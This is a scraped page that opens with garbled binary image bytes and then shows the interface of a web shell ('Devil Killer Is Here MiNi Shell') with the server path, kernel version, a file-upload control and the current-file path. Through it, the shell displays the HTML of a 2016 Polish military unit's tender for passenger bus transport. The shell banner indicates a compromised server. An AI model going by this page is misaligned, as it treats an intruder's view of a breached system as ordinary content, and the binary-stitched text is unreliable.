JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160113/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160113/3937-N-2016.html

<p class="kh_header"><b>Wędrzyn: USŁUGI TRANSPORTOWE  - PRZEWÓZ OSÓB</b><br>
<b>Numer ogłoszenia: 3937 - 2016; data zamieszczenia: 13.01.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 45 Wojskowy Oddział Gospodarczy , 69-211 Wędrzyn, woj. lubuskie, tel. 95 7556236, faks 95 7556222.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www45wog.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Organizacyjna Skarbu Państwa podległa MON.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USŁUGI TRANSPORTOWE  - PRZEWÓZ OSÓB.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi transportowe -przewóz osób wraz z kierowcą
1.1Usługa polega na świadczeniu przewozów osobowych  dla potrzeb Zamawiającego przez okres od dnia podpisania umowy do 23.12.2016r. Usługa  świadczona będzie, 
na terenie kraju i krajów ościennych oraz krajów NATO i UE. 
1.2Przewóz osób wraz z kierowcą dla 45 Wojskowego Oddziału Gospodarczego Wędrzyn. Powyższa usługa ma na celu zabezpieczenie działalności bieżącej i szkoleniowej oraz administracyjnej jednostek usytuowanych w Międzyrzeczu, Wędrzynie i Skwierzynie  i może objąć teren całego kraju, kraje ościenne i kraje Unii Europejskiej.
1.3Usługa powinna zapewnić dojazdy na szkolenia poligonowe, szkolenia strzeleckie, skoki spadochronowe, szkolenia w Wojskowych Ośrodkach Szkolenia, zabezpieczenie przemieszczania PKW po terenie kraju w okresie przygotowania do wyjazdu lub powrotu (przewóz z macierzystych JW. na lotniska i  z lotnisk do macierzystych JW.) zabezpieczenie uroczystości wojskowych oraz odpraw i szkoleń zgodnie z przesłanymi w tym zakresie potrzebami do 45 WOG.
1.4W zależności od okoliczności i potrzeb w zakres usługi mogą wchodzić następujące czynności:
1.4.1	Zapewnienie pojazdów samochodowych wraz z kierowcą przystosowanych do przewozu:
- min. 50 +/- (5)  miejsc siedzących (wraz z kierowcą); 
- 20 +/- (3) miejsc siedzących (wraz z kierowcą);
- oraz do 9 miejsc siedzących (wraz z kierowcą);
1.4.2	Pojazdy powinny zapewniać możliwość przewozu  osób wraz z indywidualnym wyposażeniem (w ramach bagażu podręcznego i ładowności bagażników);
1.4.3	Dojazd   do miejsca wskazanego przez Zamawiającego w zapotrzebowaniu   na koszt własny Wykonawcy, przewóz  osób do miejsca przeznaczenia oraz w razie konieczności nocleg, (związane  to będzie  ze specyfiką wykonywanego przez Zamawiającego zadania).
1.5Dodatkowe postanowienia dotyczące przedmiotu zamówienia i spraw organizacyjnych:
1.5.1	Wykonawca zobowiązuje się do podstawienia żądanej ilości pojazdów samochodowych wraz z kierowcą na każde wezwanie otrzymane faksem lub telefonicznie z 36 godz. wyprzedzeniem, a w wyjątkowych sytuacjach                    12 godz. przed wyjazdem (może wystąpić potrzeba użycia 5 i więcej pojazdów  w danym dniu).
1.5.2	Wykonawca przyjmuje do wiadomości, iż ze względu na specyfikę zadań, Zamawiający dopuszcza możliwość rezygnacji -w czasie do 8 godz. przed wyjazdem z wcześniej ustalonych przejazdów nie ponosząc za to żadnych kosztów finansowych.
1.5.3	Przewozy mogą być realizowane w jedną lub w obie strony, będzie zachodziła potrzeba oczekiwania podczas przerwy w podróży nawet do kilkunastu godzin.
1.5.4	 W celu właściwego wykonania usługi wymagane jest posiadanie minimum:
- 5 autobusów 50 +/- (5) miejsc siedzących wraz z kierowcą wyposażonych w pasy bezpieczeństwa dla wszystkich pasażerów; 
-2 mikrobusy 20 +/- (3) miejsc siedzących wraz z kierowcą;
-2 busy 9 miejsc siedzących wraz z kierowcą;
1.7W przypadku potrzeby zorganizowania transportu dużej ilości osób lub zwiększonej ilości środków transportowych pomoc w zorganizowaniu takiego przemieszczenia jako znawca branży.
1.8Posiadanie licencji na krajowy transport drogowy osób oraz na międzynarodowy transport drogowy (kraje NATO i UE oraz kraje ościenne) osób (1 bus i 1 autobus), 
w przypadku gdyby wystąpiła taka potrzeba. 
1.9Wykonanie usługi na sprawnych technicznie środkach transportowych spełniających ogólne wymogi bezpieczeństwa, europejskich norm ochrony środowiska oraz zapewniający komfort jazdy dla pasażerów.
1.10Posiadanie polisy OC, NW i NNW, którą środki transportowe obligatoryjnie muszą posiadać oraz aktualne badania techniczne pojazdów.
1.11Podstawienia zastępczego środka transportu w przypadku uszkodzenia pojazdu podczas wykonywania usługi w czasie do 1 godziny nie licząc czasu dojazdu do miejsca zdarzenia od chwili otrzymania zawiadomienia o awarii. W razie przedłużania się wyznaczonego terminu  o 1 godzinę Zamawiający jest uprawniony do  wynajęcia  innego pojazdu przewoźnika, a różnicę  w kosztach pokrywa Wykonawca;
1.12Podstawienie zastępczego środka transportowego w przypadku zakwestionowania stanu technicznego podstawionego pojazdu w czasie do 1 godz. od chwili otrzymania zawiadomienia.
1.13	Zapotrzebowania będą składane:
-w trybie normalnym z 36 godzinnym wyprzedzeniem;
-w trybie przyspieszonym z 12 godzinnym wyprzedzeniem;
-w przypadku przewożenia dużej ilości osób (powyżej 150 osób) z wyprzedzeniem pięciu dni roboczych.
1.14	Wykonywanie usługi zgodnie z wymogami Kodeksu pracy i Ustawy z dnia 
16 kwietnia 2004 r. o czasie pracy kierowców (Dz. U. z dnia 30.04.2004, Dz. U.         Nr 92 poz. 879 z późniejszymi zm.) oraz zgodnie z wymogami Ustaw z dnia 20 czerwca 1997r. Prawo o ruchu drogowym (Dz. U. z dnia 2005r. Nr 108, poz. 908 z późniejszymi zm.) w zakresie dotyczącym pojazdów.
1.15 Terminowe podstawienie środków transportowych w wyznaczonym miejscu.
1.16 Podstawienie środka transportowego w należytej czystości wewnątrz i na zewnątrz pojazdu oraz systematyczne dbanie o zachowanie właściwej czystości w trakcie realizacji usługi transportowej.
1.17Możliwość przewiezienia jednorazowo do 150 osób w jednym kursie.
1.18 Odpłatność za autostrady, płatne strefy parkowania w tym parkingi strzeżone i przejazd płatnymi odcinkami dróg  powinny być wliczone w stawkę kilometrową i stanowią koszty Wykonawcy.
1.19W przypadku wyjazdów kilkudniowych noclegi kierowcy i jego całodzienne wyżywienie kalkulować w stawkę kilometrową, co stanowi koszt po stronie Wykonawcy.
1.20	Potwierdzenie wykonania usługi realizowane będzie każdorazowo po zakończeniu przewozu poprzez czytelne podpisy kierowcy i dowódcy (dysponenta pojazdu) w Karcie przejazdu (załącznik do umowy), wykonawca/kierowca odpowiada za czytelne podpisanie karty przejazdu przez dowódcę/dysponenta pojazdu.
1.21Planowana ilość kilometrów do przejechania - 20 000 km;   
1.22W przypadku długich tras wykonawca zapewnia kierowców na zmianę.
1.23 Ilość kilometrów do przejechania może ulec zmianie, zwiększyć lub zmniejszyć     w zależności od potrzeb i własnych możliwości. 
1.24	  Wyposażenie pojazdów:
wyposażenie autobusów:
- siedzenia ergonomiczne;
- pasy bezpieczeństwa
- uchylne siedzenia; 
- 50+/- (5)  miejsc siedzących dla pasażerów;
- sprawna klimatyzacja.
wyposażenie busa:
- oparcia z zagłówkami;
- uchylne siedzenia;
- pasy bezpieczeństwa
- 20+/-(3) miejsc siedzących dla pasażerów;
- sprawna klimatyzacja.
wyposażenie mikrobusa:
- oparcia z zagłówkami;
- uchylne siedzenia;
- pasy bezpieczeństwa
- 9 miejsc siedzących dla pasażerów;
- sprawna klimatyzacja. 
1.25	Informacje uzupełniające dla oferentów:
Płatność za przejazd w jedną stronę
1.24.1 Wykonanie usługi liczone będzie od miejsca wskazanego w zamówieniu lub Instytucji wskazanej w zamówieniu przez osobę upoważnioną przez Zamawiającego do miejsca wskazanego w zamówieniu. Jeżeli przewóz osób jest realizowany tylko w jedną stronę to w takim przypadku odpłatność nastąpi za odcinek trasy na którym przewożone były te osoby (określone w zamówieniu);
1.24.2Przy wyjazdach  do trzech  dni kierowca powinien nocować w miejscu docelowym wraz z przewożonymi pracownikami (za nocleg i wyżywienie kierowcy płaci wykonawca). Powrót powinien nastąpić z w/w pracownikami Zamawiającego. Za przejazd powrotny bez pracowników (pusty) Zamawiający nie ponosi kosztów.
1.24.3Przy wyjazdach cztero dniowych i dłuższych kierowca zostanie zwolniony 
(poza przypadkiem w którym autobus pozostaje w dyspozycji zamawiającego) wraca. Zamawiający  dokona płatności za przejazd w obie strony w tym za pusty przejazd z powrotem do firmy i za ponowny dojazd po naszych pracowników. Może zajść sytuacja w której autobus pozostaje w dyspozycji zamawiającego - koszt utrzymania kierowcy (nocleg, wyżywienie) ponosi Wykonawca; 
1.24.4Opłata za przejechaną trasę będzie to iloczyn przejechanych kilometrów przez Wykonawcę z miejsca wskazanego w zapotrzebowaniu do miejsca wskazanego w zapotrzebowaniu oraz stawki kilometrowej za zapotrzebowany rodzaj środka transportowego; 
1.24.5Zapłata za wykonaną usługę nastąpi  w formie polecenia przelewu z rachunku  bankowego Zamawiającego w ciągu 30 dni od daty otrzymania prawidłowo wystawionej faktury z dołączoną i wypełniona zgodnie z wzorem kartą przejazdu i kopią zlecenia, na rachunek bankowy Wykonawcy.
1.26	Do wyceny złożonej oferty należy przyjąć ceny za kilometr w której powinny znajdować się wszystkie składniki w zależności od wielkości przewożonej grupy w tym koszt  utrzymania kierowcy (noclegi, wyżywienie), opłaty za płatne odcinki dróg, opłaty za parkingi( w tym za parkingi strzeżone).
1.27	W rozliczeniu przejazdu wycena do faktury będzie polegała na ustaleniu stanu faktycznego ilości przejechanych kilometrów na zamówionej trasie oraz iloczyn stawki kilometrowej za zapotrzebowany pojazd.
1.28	Ocena przedmiotu zamówienia będzie wynikała z sumy stawek za poszczególne przewożone grupy osobowe podczas podróży:
a) przejazdy krajowe:
- mikrobus do 9 miejsc siedzących; 
- bus  20 +/- (3)  miejsc siedzących;
- autobus 50 +/- (5) miejsc siedzących.
b) przejazdy zagraniczne:
- mikrobus 9 miejsc siedzących;
- bus 20 +/- (3) miejsc siedzących;
  - autobus 50 +/- (5) miejsc siedzących.
1.29	Wykonawcy nie przysługują żadne roszczenia względem zamawiającego z tytułu niezrealizowania w całości przedmiotu zamówienia.
1.30	Wielkość zamówienia może ulec zmianie zwiększeniu lub zmniejszeniu     w zależności od potrzeb Zamawiającego..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.14.00.00-1, 60.17.00.00-0, 60.17.20.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 23.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu nie wymaga się wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca posiada uprawnienie do wykonywania            określonej działalności lub czynności, jeżeli złoży oświadczenie, o którym mowa          w   art. 44 ustawy Pzp (zał. nr 2 do SIWZ) oraz licencję uprawniającą do krajowego transportu drogowego osób oraz na międzynarodowy transport drogowy (kraje NATO i UE) osób.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca posiada niezbędną wiedzę i doświadczenie do   
            wykonywania zamówienia, jeżeli złoży oświadczenie, o którym mowa w art. 44
ustawy Pzp (zał. nr 2 do SIWZ) oraz wykaz wykonania dwóch usług, a w przypadku świadczeń okresowych lub ciągłych  również wykonywanych,  głównych usług,                 w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  z podaniem ich rodzaju            i wartości, daty  i miejsca wykonania odpowiadających swoim rodzajem przedmiotowi zamówienia (załącznik nr 4) wraz z załączonymi dowodami  należytego wykonania  (poświadczenie lub referencje) na łączną wartość nie mniejszą  niż  200 000,00zł brutto</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca posiada niezbędny potencjał techniczny   jeżeli złoży oświadczenie, o którym  mowa  w art. 44 ustawy Pzp (zał. nr 2 i nr5 do SIWZ) tj.: 
W oświadczeniu, o którym mowa Wykonawca przedstawi jakimi środkami transportu dysponuje przystępując do realizacji przedmiotu zamówienia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca posiada i osoby zdolne do wykonywania zamówienia, jeżeli złoży oświadczenie, o którym 
      mowa  w art. 44 ustawy Pzp (zał. nr 2 i nr 5 do SIWZ) tj.: 
W oświadczeniu, o którym mowa Wykonawca oświadczy,  iż usługi będą wykonywane przez osoby posiadające wymagane uprawnienia            do prowadzenia pojazdów (autobusów) z zachowaniem obowiązujących przepisów,                     a w szczególności Kodeku Pracy i ustawy z dnia  16 kwietnia 2004r. o czasie pracy kierowców (Dz. U. z 30.04.2004r., Dz. U. Nr 92 poz. 879 z późn. zm.) oraz zgodnie     z wymogami ustaw z dn. 20 czerwca 1997r.  Prawo o ruchu drogowym (Dz. U.           z 2005r. Nr 108, poz. 908 poźn. zm.).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca znajduje się w sytuacji ekonomicznej                
 i finansowej zapewniającej wykonanie zamówienia, jeżeli złoży oświadczenie, którym mowa w art. 44 ustawy Pzp (zał. nr 2 do SIWZ) oraz opłaconą polisę lub inny dokument  potwierdzający, że Wykonawca jest ubezpieczony odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej  z przedmiotem  zamówienia na wartość nie mniejszą niż  200.000,00 zł
          Wykonawca zobowiązuje się, że będzie utrzymywał powyższy zakres  ubezpieczenia      
   do  końca trwania umowy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca składający ofertę do postępowania, ubiegający się o udzielenie zamówienia polegając na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy PZP- winien do oferty przedłożyć następujące dokumenty podmiotu użyczającego zasoby:
1)	Wypełniony załącznik nr 6 do SIWZ, tj.  Zobowiązanie do oddania do dyspozycji zasobów.
2)	oświadczenie o spełnianiu warunków określone w art. 44 ustawy Prawo zamówień publicznych- art. 22 ust.1 Pzp (wg wzoru zawartego w Załączniku nr 2 do SIWZ) oraz dokumentów określonych w SIWZ w Rozdziale VII pkt. 2 ppkt. od 1-4 podmiotu użyczającego.
Oświadczenie o przynależności do grupy kapitałowej w rozumieniu ustawy z dnia 
16 lutego 2007 r. o ochronie konkurencji i konsumentów, Dz. U. z 2007r., nr 50, poz.     331 z późn. zm. w zakresie określonym w załączniku nr 1 do SIWZ - formularzu ofertowym  pkt. 7;  przy czym pod pojęciem:
1)	Grupa kapitałowa - rozumie się przez to wszystkich przedsiębiorców, którzy są kontrolowani w sposób bezpośredni  lub pośredni przez jednego przedsiębiorcę, w tym również tego przedsiębiorcę ( Ustawa z dnia 16 lutego 2007 r. o ochronie konkurencji            i konsumentów, Dz. U. z 2007., nr 50, poz. 331 z późn. zm., Art. 4 pkt. 14)
2)	 Przedsiębiorca - rozumie się przez to przedsiębiorcę w rozumieniu przepisów                             o swobodzie działalności gospodarczej ( Ustawa z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, Dz. U. z 2007, nr 50, poz. 331 z późn. zm., Art. 4 pkt. 1)
3)	Przejęcie kontroli - rozumie się przez to wszelkie formy bezpośredniego lub pośredniego uzyskania przez przedsiębiorcę uprawnień, które osobno albo łącznie, przy uwzględnieniu wszystkich okoliczności prawnych lub faktycznych, umożliwiają wywieranie decydującego wpływu na innego przedsiębiorcę lub przedsiębiorców
( Ustawa z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, Dz. U. z 2007, nr 50, poz. 331 z późn. zm., art. 4 pkt.4) 
Wypełniony i podpisany formularz ofertowy z wykorzystaniem wzoru  zamieszczonego w niniejszej SIWZ - Załącznik nr 1 do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
